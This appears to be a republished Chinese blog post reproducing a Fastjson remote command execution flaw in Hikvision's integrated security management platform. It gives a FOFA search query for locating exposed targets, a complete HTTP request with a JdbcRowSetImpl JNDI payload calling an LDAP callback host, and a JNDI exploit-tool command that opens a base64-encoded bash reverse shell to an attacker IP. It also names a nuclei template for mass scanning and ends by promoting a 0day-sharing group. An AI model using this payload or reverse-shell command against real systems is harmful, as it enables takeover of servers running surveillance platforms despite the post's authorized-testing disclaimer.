漏洞复现 HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
2022-12-2 11:9:43 Author: 阿乐你好(查看原文) 阅读量:313 收藏

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!


0x02 漏洞描述

海康威视综合安防管理平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。

0x03 漏洞复现

fofa:app="HIKVISION-综合安防管理平台"

1.使用POC执行ldap访问dnslog命令,得到回显

POST /bic/ssoService/v1/applyCT HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: https://fofa.info/Dnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Te: trailersConnection: closeContent-Type: application/jsonContent-Length: 200
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://6setlb.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

2.也可使用JNDI利用工具进行进一步利用,如下

1.工具下载:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
2.开启rmi/jndi服务:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,bash反弹shell脚本base64编码}|{base64,-d}|{bash,-i}" -A IP

3.nuclei验证已发表于知识星球

nuclei.exe -t HIKVISION_ZHAFGL_Fastjson_RCE.yaml -l subs.txt -stats
网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247488839&idx=1&sn=196ac9defde2cd1ed6f2999c8ec056a3&chksm=979a3a0fa0edb319ccbfdf2c2048a33c3648321379ea4003e037a24b4ae6a8d68badda4b2acb#rd
如有侵权请联系:admin#unsafe.sh